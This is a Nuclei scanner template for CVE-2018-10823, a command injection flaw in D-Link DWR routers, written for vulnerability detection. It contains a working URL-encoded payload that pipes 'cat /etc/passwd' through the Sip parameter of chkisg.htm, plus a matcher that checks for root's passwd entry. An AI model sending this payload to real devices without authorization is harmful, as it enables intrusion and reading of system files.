nuclei-templates/cves/2018/CVE-2018-10823.yaml

34 lines
1.0 KiB
YAML

id: CVE-2018-10823
info:
name: D-Link Routers - Command Injection
author: wisnupramoedya
severity: high
description: An issue was discovered on D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. An authenticated attacker
may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
reference:
- https://www.exploit-db.com/exploits/45676
- https://nvd.nist.gov/vuln/detail/CVE-2018-10823
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2018-10823
cwe-id: CWE-78
tags: cve,cve2018,rce,iot,dlink,router
requests:
- method: GET
path:
- "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200